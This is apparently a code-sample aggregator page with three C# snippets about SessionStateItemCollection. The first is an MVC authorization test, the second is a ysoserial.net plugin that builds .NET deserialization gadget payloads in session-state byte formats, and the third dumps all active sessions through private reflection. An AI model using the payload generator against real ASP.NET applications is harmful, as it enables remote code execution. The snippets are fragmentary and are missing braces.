예제 #1
        public void AuthorizationAttribute_Test()
            var sessionItems = new System.Web.SessionState.SessionStateItemCollection();
            var controllerContext = new FakeControllerContext(TestHelper.Resolve<TopicsController>(), "http://localhost", null, null, new System.Collections.Specialized.NameValueCollection(), new System.Collections.Specialized.NameValueCollection(), new System.Web.HttpCookieCollection(), sessionItems);
            var context = new AuthorizationContext(controllerContext, new FakeActionDescriptor());
            var att = new RequireAuthorizationAttribute(UserRole.Member);
            att.Routes.Add(new StrictRoute("login", new MvcRouteHandler())
                Url = "login",
                Defaults = new System.Web.Routing.RouteValueDictionary(new
                    controller = "Authentication",
                    action = "Login"
            context.Result = null;
            Assert.IsInstanceOfType(context.Result, typeof(RedirectResult));

            //Test with user
            User user = ServicesTests.GetTestUser();
            sessionItems["User"] = new UserState(user, AuthenticationProvider.Facebook);
            context.Result = null;
예제 #2
        public object Run(string[] args)
            InputArgs     inputArgs = new InputArgs();
            List <string> extra;

                extra                   = options.Parse(args);
                inputArgs.Cmd           = command;
                inputArgs.Minify        = minify;
                inputArgs.UseSimpleType = useSimpleType;
                inputArgs.Test          = test;
            catch (OptionException e)
                Console.Write("ysoserial: ");
                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");

            object payload = "";

            if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
                Console.Write("ysoserial: ");
                Console.WriteLine("Incorrect plugin mode/arguments combination");
                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");

            if (mode.ToLower().Equals("sessionstateitemcollection"))
                /* I decided to change the TypeConfuseDelegateGenerator class and use its gadget instead of doing this through the following hacky way */

                /* hacky way begin
                 * byte[] tempPayload_init = (byte[])new TypeConfuseDelegateGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
                 * byte[] tempPayload = new byte[tempPayload_init.Length + 1]; // adding one byte initially to fix the length problem
                 * tempPayload_init.CopyTo(tempPayload, 0);
                 * System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection();
                 * items[""] = tempPayload;
                 * MemoryStream stream = new MemoryStream();
                 * BinaryWriter writer = new BinaryWriter(stream);
                 * items.Serialize(writer);
                 * stream.Flush();
                 * tempPayload = stream.ToArray();
                 * byte[] newSerializedData = new byte[tempPayload.Length-27-1-1]; // yes don't ask about the numbers! it's magical!
                 * Array.Copy(tempPayload, 0, newSerializedData, 0, 9); // reading first 9 bytes
                 * Array.Copy(tempPayload, 36, newSerializedData, 9, tempPayload.Length-27-1-9-1); // ignoring 27 bytes after 9 bytes + reading the rest + ignoring the last byte
                 * newSerializedData[13] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream
                 * // hacky way ends */

                /* here it is using the sane way! */
                object serializedData = (object)TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
                System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection();
                items[""] = serializedData;
                MemoryStream stream = new MemoryStream();
                BinaryWriter writer = new BinaryWriter(stream);
                payload = stream.ToArray();

                if (test)
                    // PoC on how it works in practice
                    stream = new MemoryStream((byte[])payload);
                    BinaryReader binReader = new BinaryReader(stream);
                    System.Web.SessionState.SessionStateItemCollection test = System.Web.SessionState.SessionStateItemCollection.Deserialize(binReader);
                // HttpStaticObjectsCollection
                byte[] serializedData    = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
                byte[] newSerializedData = new byte[serializedData.Length + 7]; // ReadInt32 + ReadString + ReadBoolean + ReadByte
                serializedData.CopyTo(newSerializedData, 7);
                newSerializedData[0] = 1;                                       // for ReadInt32
                newSerializedData[5] = 1;                                       // for ReadBoolean
                newSerializedData[6] = 20;                                      // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream

                payload = newSerializedData;

                if (test)
                    // PoC on how it works in practice
                    try {
                        MemoryStream stream    = new MemoryStream((byte[])payload);
                        BinaryReader binReader = new BinaryReader(stream);
                        System.Web.HttpStaticObjectsCollection test = System.Web.HttpStaticObjectsCollection.Deserialize(binReader);
                    catch (Exception err)
                        Debugging.ShowErrors(inputArgs, err);

예제 #3
        GetActiveSessions(System.Web.HttpContext context)
            // Dictionary(Of String, Object) 'List(Of SessionStateItemCollection)
            // Dim lsSessionStates As New List(Of SessionStateItemCollection)

            // int strLcId = System.Web.HttpContext.Current.Session.LCID;
            // string strSeId = System.Web.HttpContext.Current.Session.SessionID;

            // System.Console.WriteLine(strLcId);
            // System.Console.WriteLine(strSeId);

            System.Collections.Generic.Dictionary <string, System.Collections.Generic.Dictionary <string, object> >
            dictAllSession = new System.Collections.Generic
                             .Dictionary <string, System.Collections.Generic.Dictionary <string, object> >();

            object obj = typeof(System.Web.HttpRuntime)
                         .GetProperty("CacheInternal", BindingFlags.NonPublic | BindingFlags.Static)
                         .GetValue(null, null);

            // List(Of System.Web.Caching.CacheSingle)
            object[] obj2 = (object[])obj.GetType().GetField("_caches", BindingFlags.NonPublic | BindingFlags.Instance)

            System.Collections.Generic.Dictionary <string, string> tD = KeyValuePairs(context);

            for (int i = 0; i < obj2.Length; i++)
                System.Collections.Hashtable c2 = (System.Collections.Hashtable)obj2[i].GetType()
                                                  .GetField("_entries", BindingFlags.NonPublic | BindingFlags.Instance)

                System.Collections.Generic.Dictionary <string, object> dictSession =
                    new System.Collections.Generic.Dictionary <string, object>();

                string strSessionId = null;

                foreach (System.Collections.DictionaryEntry entry in c2)
                    object o1 = entry.Value.GetType().GetProperty("Value", BindingFlags.NonPublic | BindingFlags.Instance)
                                .GetValue(entry.Value, null);
                    if (o1.GetType().ToString() == "System.Web.SessionState.InProcSessionState")
                        System.Web.SessionState.SessionStateItemCollection sess =
                            o1.GetType().GetField("_sessionItems", BindingFlags.NonPublic | BindingFlags.Instance)

                        if (sess != null)
                            // yield Return sess
                            // lsSessionStates.Add(sess)

                            System.Type tKeyType = entry.Key.GetType();

                            // System.Reflection.PropertyInfo[] pis  = tKeyType.GetProperties(BindingFlags.NonPublic | BindingFlags.Instance);
                            // System.Reflection.FieldInfo[] fis  = tKeyType.GetFields(BindingFlags.NonPublic | BindingFlags.Instance);

                            // System.Reflection.FieldInfo fi = tKeyType.GetField("Key");
                            System.Reflection.PropertyInfo pi = tKeyType.GetProperty("Key", BindingFlags.NonPublic | BindingFlags.Instance);
                            if (pi != null)
                                strSessionId = System.Convert.ToString(pi.GetValue(entry.Key, null));

                            // string str = (string) entry.Key.GetType().GetProperty("Key").GetValue(entry.Key, null);

                            for (int tC = 0; tC <= sess.Keys.Count - 1; tC++)
                                if (tD.ContainsKey(sess.Keys[tC]))
                                    sess[sess.Keys[tC]] = tD[sess.Keys[tC]];

                            foreach (string tKey in sess.Keys)
                                // dictSession.Add(i.ToString() + "-" + tKey, sess[tKey]); ' WTF ???
                                dictSession[tKey] = sess[tKey];

                if (string.IsNullOrEmpty(strSessionId))
                    strSessionId = i.ToString();
                    strSessionId = i.ToString() + ": " + strSessionId;

                dictAllSession.Add(strSessionId, dictSession);

            return(dictAllSession); // dictSession 'lsSessionStates
        } // GetActiveSessions